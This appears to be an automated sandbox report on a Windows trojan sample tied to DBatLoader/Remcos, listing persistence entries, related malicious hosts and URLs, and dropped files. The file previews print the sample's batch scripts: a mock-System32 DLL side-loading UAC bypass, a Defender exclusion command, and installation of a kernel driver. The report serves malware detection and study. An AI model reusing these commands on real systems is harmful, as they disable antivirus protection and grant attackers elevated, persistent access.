                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:11
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:PCMNil7wkU.exe
                                                        renamed because original name is a hash value
                                                        Original Sample Name:344c9c0f72c535e334a4b605212c69d9.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@13/12@2/2
                                                        EGA Information:
                                                        • Successful, ratio: 100%
                                                        HCA Information:
                                                        • Successful, ratio: 88%
                                                        • Number of executed functions: 107
                                                        • Number of non-executed functions: 190
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                        • Excluded IPs from analysis (whitelisted): 13.107.42.12, 72.21.81.240
                                                        • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, sn-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-web-geo.onedrive.akadns.net, slscr.update.microsoft.com, wu.ec.azureedge.net, odc-sn-files-geo.onedrive.akadns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, odc-sn-files-brs.onedrive.akadns.net, l-0003.l-msedge.net, ocsp.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • VT rate limit hit for: PCMNil7wkU.exe
                                                        TimeTypeDescription
                                                        14:32:49API Interceptor2x Sleep call for process: PCMNil7wkU.exe modified
                                                        14:32:55AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Akaelkov C:\Users\Public\Akaelkov.url
                                                        14:33:00API Interceptor2x Sleep call for process: vokleakA.pif modified
                                                        14:33:05API Interceptor2x Sleep call for process: Akaelkov.PIF modified
                                                        14:33:05AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Akaelkov C:\Users\Public\Akaelkov.url
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        150.171.43.11https://1drv.ms/b/s!Au_iWJNj9ucega8VdNm54Y_182oELAGet hashmaliciousUnknownBrowse
                                                          https://1drv.ms/b/s!Aj_dAsJOtS3GeKVcEaa61wq6boU?e=TSuYkWGet hashmaliciousUnknownBrowse
                                                            https://1drv.ms/b/c/104cf0615741e2d5/EXTuT5BucDJMnjbDCsUAOQEBZObCLdRF3lcopYmt7UCzZwGet hashmaliciousUnknownBrowse
                                                              https://1drv.ms/b/c/2367a926d3e76ff5/EdSjhpSXNIZLjlZm5uxzCe8Br8hlzv3SD5dyUTUvqsDHSgGet hashmaliciousUnknownBrowse
                                                                https://1drv.ms/b/s!BGMfJoMNhVyWhNsYof1fW2Os2-MFKg?e=17bwefQAtkWLf00fLUAM8g&at=9Get hashmaliciousUnknownBrowse
                                                                  139.84.229.159DOC9087.exeGet hashmaliciousAsyncRATBrowse
                                                                    PO301.exeGet hashmaliciousAsyncRAT, zgRATBrowse
                                                                      Details.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        dual-spov-0006.spov-dc-msedge.nethttps://1drv.ms/b/s!Au_iWJNj9ucega8VdNm54Y_182oELAGet hashmaliciousUnknownBrowse
                                                                        • 150.171.43.11
                                                                        https://1drv.ms/b/s!Aj_dAsJOtS3GeKVcEaa61wq6boU?e=TSuYkWGet hashmaliciousUnknownBrowse
                                                                        • 150.171.43.11
                                                                        SecuriteInfo.com.Win32.SpywareX-gen.21740.30024.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                        • 150.171.41.11
                                                                        https://1drv.ms/b/c/104cf0615741e2d5/EXTuT5BucDJMnjbDCsUAOQEBZObCLdRF3lcopYmt7UCzZwGet hashmaliciousUnknownBrowse
                                                                        • 150.171.43.11
                                                                        https://1drv.ms/b/c/2367a926d3e76ff5/EdSjhpSXNIZLjlZm5uxzCe8Br8hlzv3SD5dyUTUvqsDHSgGet hashmaliciousUnknownBrowse
                                                                        • 150.171.43.11
                                                                        https://1drv.ms/b/s!BGMfJoMNhVyWhNsYof1fW2Os2-MFKg?e=17bwefQAtkWLf00fLUAM8g&at=9Get hashmaliciousUnknownBrowse
                                                                        • 150.171.43.11
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        MICROSOFT-CORP-MSN-AS-BLOCKUSbTgf.exeGet hashmaliciousNjratBrowse
                                                                        • 20.234.71.164
                                                                        SecuriteInfo.com.Win32.DropperX-gen.28581.15702.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                        • 13.107.137.11
                                                                        https://masterengineers-my.sharepoint.com/:b:/g/personal/tcampbell_masterengineersinc_com/EdIYTGk86nZNgJT4VeyaGccB0h74Yw7dfJzxPtqNYjG_Xg?e=4%3aMZuLFd&at=9Get hashmaliciousHTMLPhisherBrowse
                                                                        • 13.107.136.10
                                                                        http://www.thewiseseeker.comGet hashmaliciousUnknownBrowse
                                                                        • 13.107.213.40
                                                                        file.exeGet hashmaliciousAmadey, Fabookie, RedLine, RisePro Stealer, StealcBrowse
                                                                        • 40.71.99.188
                                                                        GLAS_DeploymentMatrix_Full_25358_20240118_024413_Mauffrey 1.xlsmGet hashmaliciousUnknownBrowse
                                                                        • 13.107.219.40
                                                                        http://timelessbeautylessons.comGet hashmaliciousUnknownBrowse
                                                                        • 13.107.213.40
                                                                        https://spectrumpaint.atlassian.net/wiki/external/ZTZiNjUxYzcwM2FjNGI0OGE1NWMwMzVkMmYwMDBlYmMGet hashmaliciousHTMLPhisherBrowse
                                                                        • 13.107.213.41
                                                                        nNEZw5ErnG.xlsmGet hashmaliciousUnknownBrowse
                                                                        • 13.107.227.41
                                                                        https://bmwag-rt-prod2-t.campaign.adobe.com/r/?id=h2ccc12b%2C8d23fb3%2C492093b&p1=//ammuchee.com/info/tech/qwertyshshdjdjdjdncnchdjdeieujdjdndncmvnvnbdsjksjhdheyjdndncmcncnc/sjsksjdjdhdncnchdheyeudjdkdkdmcmcckdjgsgshdbdndjcndnjdjdjssbcnchdhsj/ilqlhsjblifgnsbvfzktoqmecnhlsygugqcuuisqkcdfbuejzvhnfndkiqoxmujypeooogotvvcaotxduopphebsnahcpgqmnjfk/#.zfsnx.bWFsZ29yemF0YS56dXJla0BEZWVaZWUucGw=Get hashmaliciousHTMLPhisherBrowse
                                                                        • 13.107.213.41
                                                                        LASALLEUSo3I77gL589.exeGet hashmaliciousNanocoreBrowse
                                                                        • 139.84.228.75
                                                                        sk3v96prYe.elfGet hashmaliciousUnknownBrowse
                                                                        • 139.84.219.126
                                                                        DOC9087.exeGet hashmaliciousAsyncRATBrowse
                                                                        • 139.84.229.159
                                                                        PO-#302651_Schrameyer-Bestellung.scr.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                        • 139.84.139.29
                                                                        PO_142023_December_final_order.scr.exeGet hashmaliciousRemcosBrowse
                                                                        • 139.84.139.29
                                                                        PO301.exeGet hashmaliciousAsyncRAT, zgRATBrowse
                                                                        • 139.84.229.159
                                                                        aofu9GeDAo.exeGet hashmaliciousNanocore, zgRATBrowse
                                                                        • 139.84.139.29
                                                                        Details.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                        • 139.84.229.159
                                                                        SecuriteInfo.com.Trojan.GenericKD.69224191.30044.24123.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                                                                        • 139.84.231.199
                                                                        https://cdn.discordapp.com/attachments/845913372713156622/1147258627971878992/Payment_83641.zipGet hashmaliciousDarkCometBrowse
                                                                        • 139.84.139.29
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                        • 150.171.43.11
                                                                        SecuriteInfo.com.Win32.DropperX-gen.28581.15702.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                        • 150.171.43.11
                                                                        PO0124.docx.docGet hashmaliciousUnknownBrowse
                                                                        • 150.171.43.11
                                                                        file.exeGet hashmaliciousAmadey, Fabookie, RedLine, RisePro Stealer, StealcBrowse
                                                                        • 150.171.43.11
                                                                        GLAS_DeploymentMatrix_Full_25358_20240118_024413_Mauffrey 1.xlsmGet hashmaliciousUnknownBrowse
                                                                        • 150.171.43.11
                                                                        nNEZw5ErnG.xlsmGet hashmaliciousUnknownBrowse
                                                                        • 150.171.43.11
                                                                        la0vsPpNBi.exeGet hashmaliciousLummaCBrowse
                                                                        • 150.171.43.11
                                                                        file.exeGet hashmaliciousLummaC, zgRATBrowse
                                                                        • 150.171.43.11
                                                                        SCAN_DSC0027929829.PDF..exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                        • 150.171.43.11
                                                                        file.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                        • 150.171.43.11
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        C:\Users\Public\Libraries\netutils.dllSecuriteInfo.com.Win32.DropperX-gen.28581.15702.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                          SCAN_DSC0027929829.PDF..exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                            DF0987890000.scr.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                              C:\Users\Public\Libraries\easinvoker.exeSecuriteInfo.com.Win32.DropperX-gen.28581.15702.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                SCAN_DSC0027929829.PDF..exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                  DF0987890000.scr.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                    Stmt_2024-01.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                      Invoice0017861201.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                        Order151smapl.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                          n6dS0UI5yA.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                            Haziran-Aral#U0131k_Eksik_Evrak_Raporu.exeGet hashmaliciousDBatLoaderBrowse
                                                                                              HG098657890000090.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                SecuriteInfo.com.Win32.SpywareX-gen.21740.30024.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                  Process:C:\Users\user\Desktop\PCMNil7wkU.exe
                                                                                                  File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Akaelkov.PIF">), ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):100
                                                                                                  Entropy (8bit):5.061467880199451
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XM9AKGOsb+Uo0Pbyn:HRYFVmTWDyzmAGErbu
                                                                                                  MD5:CB88BB372A963D0E8F5EF7BD83D853B7
                                                                                                  SHA1:58ACB2C46E66F74252C2DC3365A66CE2923CA428
                                                                                                  SHA-256:7E3105CD8CDAD213F0D7C46C68AA7A04709123015C86D03C94E442962EBE1849
                                                                                                  SHA-512:B4A36067CB8C5AA76C3E71E0D488B8FDB1F8B9CF4949239DA6B58FA8B01E0E757898337B541D89837B5CF35854B389E6CBC8A6C8BD13E703AC41D3A9F73B99C5
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Akaelkov.PIF"..IconIndex=61..HotKey=46..
                                                                                                  Process:C:\Users\user\Desktop\PCMNil7wkU.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1743360
                                                                                                  Entropy (8bit):7.502655957593833
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24576:ABOzHk9lBOQdkm5UfwauFL3WlrpY7Gv1eeajEja3KgffHCx2GwVT6ltVIaH3+j:AwyBmm5VXL3WZ7vcVjEvGHaKV2FJ3+j
                                                                                                  MD5:344C9C0F72C535E334A4B605212C69D9
                                                                                                  SHA1:952E1B506659A4113B2EB0857DBB86EE08E043A5
                                                                                                  SHA-256:5664820279AA20D408C82998BFF07AB34C0986124B09E9EF2025C73686C77F4F
                                                                                                  SHA-512:A0E787755A38B2F3DE72F17530B8AB6893DB498C50A957DF17CE16945B661E5DAEA648B3936267660A35478AC127A125A78C5F53099451E6950488198D204BA5
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 26%
                                                                                                  Reputation:low
                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.............................'.......0....@..........................0...................@.............................. &.......d...................P..0o...........................@......................@................................text............................... ..`.itext....... ...................... ..`.data........0......................@....bss....X6...............................idata.. &.......(..................@....tls....4....0...........................rdata.......@......................@..@.reloc..0o...P...p..................@..B.rsrc....d.......d...6..............@..@.............0......................@..@................................................................................................
                                                                                                  Process:C:\Users\user\Desktop\PCMNil7wkU.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):404
                                                                                                  Entropy (8bit):5.010767804598093
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:rT4etMs2cLv0Y/T2cLZ9ULT2cLZthGKFIs2cLZXIs2cLZWKmxkv:f4etMXK0Yi5L60GeWbRKZv
                                                                                                  MD5:6880148D6CD8FABDCE94B7E91DBD8D17
                                                                                                  SHA1:870E9AD13355A8452746E0904D004EE8C8EC66E5
                                                                                                  SHA-256:0BFE311FFB1DE96CBB2616C2A59C2A1A4942EC03073CC2DDFDFC43F79C74D18A
                                                                                                  SHA-512:810EE2896597CBCF813B9285BB2D7F9127360A4D8A872C47460D32710FE114C27ED58F840DC8BCFDAF7B826E7E46C78C0E814E4FA3D380D10737673A1FEBF38E
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:start /min cmd /c mkdir "\\?\C:\Windows " &..mkdir "\\?\C:\Windows \System32" &..ECHO F|xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y &..ECHO F|xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y &..ECHO F|xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y &..ECHO F|xcopy "x.bat" "C:\Windows \System32\" /K /D /H /Y &.."C:\\Windows \\System32\\easinvoker.exe" &..EXIT ......
                                                                                                  Process:C:\Users\user\Desktop\PCMNil7wkU.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):271
                                                                                                  Entropy (8bit):4.820351746235622
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:rYGnyiMMQ75ieGgdEYlRALolXlXINbaH1BYPWND1Qozn:8GnGMQ7hu+m2XlXI+BYONe2
                                                                                                  MD5:D62B11DC4DC821EF23260E5B0E74A835
                                                                                                  SHA1:CDFF2004CB9EF149F75FAE296F50F4FBFEFB2E84
                                                                                                  SHA-256:D1B19B878A3AE98F650843314CC3EF8D681013F6E18E0201CB47A0AFA45FC349
                                                                                                  SHA-512:27B8292EB318413B965E1C7552165E65F9003D03B15DDC0C5C142420A1A174303F983C268942D7B60C74AC4E8E79E01F83510807FC0C492CABDF4948BC69C625
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:start /min cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & ..sc.exe create truesight binPath="C:\Users\Public\Libraries\truesight.sys" type=kernel &..sc.exe start truesight &..exit....
                                                                                                  Process:C:\Users\user\Desktop\PCMNil7wkU.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4
                                                                                                  Entropy (8bit):2.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Ovn:Ovn
                                                                                                  MD5:89B289543B1801050A1FA5F665682F9B
                                                                                                  SHA1:F01FC9F97420AD6AEAF09BE80D1D9BA5B69C4A19
                                                                                                  SHA-256:ABCA10E5C0FF2B657C09CD50D7AA667175FE7A1402550D6C43547EBF49FA71D6
                                                                                                  SHA-512:216E44DAC574B670E8BDE073574316C58145C7AF6A89506534FE67E82C3D4DFDC5EBE39AC9C13181C6EC1F846ECB9ABADAAB6BD9FB7C3F03AE3524223D79733A
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:86..
                                                                                                  Process:C:\Users\user\Desktop\PCMNil7wkU.exe
                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):131648
                                                                                                  Entropy (8bit):5.225468064273746
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:zar2xXibKcf5K67+k02XbFbosspwUUgcR:Nibl7+k02XZb9UA
                                                                                                  MD5:231CE1E1D7D98B44371FFFF407D68B59
                                                                                                  SHA1:25510D0F6353DBF0C9F72FC880DE7585E34B28FF
                                                                                                  SHA-256:30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
                                                                                                  SHA-512:520887B01BDA96B7C4F91B9330A5C03A12F7C7F266D4359432E7BACC76B0EEF377C05A4361F8FA80AD0B94B5865699D747A5D94A2D3DCDB85DABF5887BB6C612
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: SecuriteInfo.com.Win32.DropperX-gen.28581.15702.exe, Detection: malicious, Browse
                                                                                                  • Filename: SCAN_DSC0027929829.PDF..exe, Detection: malicious, Browse
                                                                                                  • Filename: DF0987890000.scr.exe, Detection: malicious, Browse
                                                                                                  • Filename: Stmt_2024-01.exe, Detection: malicious, Browse
                                                                                                  • Filename: Invoice0017861201.exe, Detection: malicious, Browse
                                                                                                  • Filename: Order151smapl.exe, Detection: malicious, Browse
                                                                                                  • Filename: n6dS0UI5yA.exe, Detection: malicious, Browse
                                                                                                  • Filename: Haziran-Aral#U0131k_Eksik_Evrak_Raporu.exe, Detection: malicious, Browse
                                                                                                  • Filename: HG098657890000090.exe, Detection: malicious, Browse
                                                                                                  • Filename: SecuriteInfo.com.Win32.SpywareX-gen.21740.30024.exe, Detection: malicious, Browse
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........GF..)...)...).,.....).,.....).,.....)...(.V.).,.....).,.....).,.....).,.....).Rich..).........................PE..d...^PPT.........."..........D...... ..........@............................. ......z................ ..................................................................@&......4....................................................................................text............................... ..`.imrsiv..................................data...............................@....pdata..............................@..@.idata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\Desktop\PCMNil7wkU.exe
                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):117430
                                                                                                  Entropy (8bit):5.039733311717682
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:M8ypRiBID3TfyIIXt/9msamG+A5j/oSnKAf0H1Cl7MbiRUiRdI8a9pFpF:M8ypRiK/S/9zG++7nKAf0HfiRdI8khF
                                                                                                  MD5:96B99E2A886D816C1B98B018ADFE6311
                                                                                                  SHA1:41F2F29BD8F366781ED1387068150EB2789DBBF8
                                                                                                  SHA-256:C300A049564EEF6D8BAA136858F1F6F0779003BD1B566D95689883C6935E2BA6
                                                                                                  SHA-512:6768632B586123B4B7C452C05B871A2474214A5D7DB4A048F7B67BC2CDA9DBF87C2EFAF18BED86666DC145F948A2EDBE3B01949FB75E6A68D813CD18A62BA45A
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 65%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: SecuriteInfo.com.Win32.DropperX-gen.28581.15702.exe, Detection: malicious, Browse
                                                                                                  • Filename: SCAN_DSC0027929829.PDF..exe, Detection: malicious, Browse
                                                                                                  • Filename: DF0987890000.scr.exe, Detection: malicious, Browse
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........\......... ..... ...$................<a............................. ................ ..............................................................P..................\........................... ...(................................................................... .................. .P`.............0.......*..............@.p..............@.......2..............@.P@.............P.......8..............@.0@.............`.......<..............@.0@.............p........................p......................>..............@.0@.....................@..............@.0.........X............H..............@.@.........h............J..............@.`.........\............L..............@.0B/4...................N..............@.PB/19..................R..............@..B/31.....%...........................@..B/45.....q...........................@..B/57.....
                                                                                                  Process:C:\Users\user\Desktop\PCMNil7wkU.exe
                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):53696
                                                                                                  Entropy (8bit):6.830243356027624
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:58GYJAAcoglJBtzCMSS4cTl9zIG3Hzuaq1ocezTBk4/HvAMxkExHs1R9zZ1SP8P:xKAAhYJz53WloceBkGHvxxIzzSPG
                                                                                                  MD5:F53FA44C7B591A2BE105344790543369
                                                                                                  SHA1:363068731E87BCEE19AD5CB802E14F9248465D31
                                                                                                  SHA-256:BFC2EF3B404294FE2FA05A8B71C7F786B58519175B7202A69FE30F45E607FF1C
                                                                                                  SHA-512:55B7B7CDA3729598F0EA47C5C67761C2A6B3DC72189C5324F334BDF19BEF6CE83218C41659BA2BC4783DAA8B35A4F1D4F93EF33F667F4880258CD835A10724D9
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...rp..rp..rp..)...vp..)...wp..)...qp..rp..$p..)...up......|p......sp......sp..Richrp..................PE..d...}..d.........."......X..."......p..........@...........................................A................................................\...(............p..D....~...S......l...@I..8............................I...............@..X............................text....-.......................... ..h.rdata.......@.......2..............@..H.data... ....`.......D..............@....pdata..D....p.......H..............@..HPAGE.................N.............. ..`INIT.................l.............. ..b.rsrc................x..............@..B.reloc..l............|..............@..B........................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\Desktop\PCMNil7wkU.exe
                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):175800
                                                                                                  Entropy (8bit):6.631791793070417
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
                                                                                                  MD5:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                  SHA1:2A001C30BA79A19CEAF6A09C3567C70311760AA4
                                                                                                  SHA-256:BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                                                                                                  SHA-512:C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....>.{..................................... ....@.......................... .......c........... ..............................................................H....................................................................................text............................... ..`.data........ ...P..................@....tls.................`..............@....rdata...............b..............@..P.idata... ...........d..............@..@.edata...............|..8...,...@...@..@
                                                                                                  Process:C:\Users\Public\Libraries\vokleakA.pif
                                                                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 66791 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                  Category:dropped
                                                                                                  Size (bytes):66791
                                                                                                  Entropy (8bit):7.995531727155867
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:1536:drFvD2YSE/sFDqV0FJJynkAhftCvMd3coa282frgW1qgNzU:drVDJSeaDqV0FJwLhVkr282fF5U
                                                                                                  MD5:AC05D27423A85ADC1622C714F2CB6184
                                                                                                  SHA1:B0FE2B1ABDDB97837EA0195BE70AB2FF14D43198
                                                                                                  SHA-256:C6456E12E5E53287A547AF4103E0397CB9697E466CF75844312DC296D43D144D
                                                                                                  SHA-512:6D0EF9050E41FBAE680E0E59DD0F90B6AC7FEA5579EF5708B69D5DA33A0ECE7E8B16574B58B17B64A34CC34A4FFC22B4A62C1ECE61F36C4A11A0665E0536B90D
                                                                                                  Malicious:false
                                                                                                  Preview:MSCF............,...................I.................gW.e .authroot.stl..u/1.5..CK..<Tk...p.k:..c.Y:.(Qc...%Y.f_...$..DHn..6i/.]....-!QQ*..}f..f...}..1....9.......pN..mI.a.....!...N.....xP.f6..C.'#.c.@GN(3.<3.......9...('3...l.l....B..x..e...UWFU.TT.l.L...._.l1......w.\..Xb.v..Q......pKP.....M`.Y......Op4=.(=P.e...p.(U.....z7MF..O......V2.....#...pj...z.!...wQ...V&.Gz..Nv.4..y(J...A..':.2Q.^u.y..<.1..2..o........H.D.S.....62.| w(...B.......h.QZ..'....l.<....6..Z...p?... .pT.......l..S..K....FT?.....p..`.&..y..."T=l.n..egf.w..X.Y...G.m....=.}cO.7.....9....o..:.Y=.-.5....ud.J&.]..*Q..._<.S....{a.=.n...PT.Um).| kpyA....h.PXY.>.......^2U...H.....V<\...k..~....H..p...8..'..?...r>.4..!u......1\.`.<.+..n..p..]...).....L.g....#.<..c]R.U."\i.Z.>...`Q..g6....0.......F.........N.s.Z..A........m.^....a_..>v.-.mk...wt.n.:...>S..;....1...j.+m.&S......$.T...i.B=h.n...c.!e.....Y.#..bw.}...d.. ..w... .&..w.9..}k...\...=....{q.Up..y;..7.-.K.'.....
                                                                                                  Process:C:\Users\Public\Libraries\vokleakA.pif
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):330
                                                                                                  Entropy (8bit):3.085588575196414
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:kKxkwsurN+SkQlPlEGYRMY9z+4KlDA3RUeWc3l0:WfPkPlE99SNxAhUeWcC
                                                                                                  MD5:DE71021802249E02316A83FA7AD23086
                                                                                                  SHA1:414401CA81B7FC3F5928C7524B6946C159113E63
                                                                                                  SHA-256:3455DF62E393107D8C7CD14DECF1D284286BE7213CCF3A03C12B299B6C36C8B5
                                                                                                  SHA-512:41A3AD9A677A86FFA4D215648B236443DDCC4EC793BD3A4EF20312D012024E74DC20FAB8652FBEB1FE2DE1D2ACAFB6640C32003D134795E304B41248B88B2586
                                                                                                  Malicious:false
                                                                                                  Preview:p...... ........!s..N..(....................................................... ..........H"......(...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".3.f.e.4.e.6.1.a.4.8.2.2.d.a.1.:.0."...
                                                                                                  Process:C:\Users\Public\Libraries\vokleakA.pif
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):520
                                                                                                  Entropy (8bit):5.355496254154943
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLUE4K5E4KlKDE4KhKiKhk
                                                                                                  MD5:3C255C75EA6EB42410894C0D08A4E324
                                                                                                  SHA1:34B3512313867B269C545241CD502B960213293A
                                                                                                  SHA-256:116B1D2FF17BE7FE8C4B6D935688F81C40716AFCD995C76BFC2D1AB2AFA774A7
                                                                                                  SHA-512:41406D84C3FC3D5EFAD22277382D9ADC444D00FDE95C1B7B6BC17E80452CA5DE084D28D892BC0C6890FE64DC733790E26D0F62FE3477175DCCCAC777FDE5E7EC
                                                                                                  Malicious:false
                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
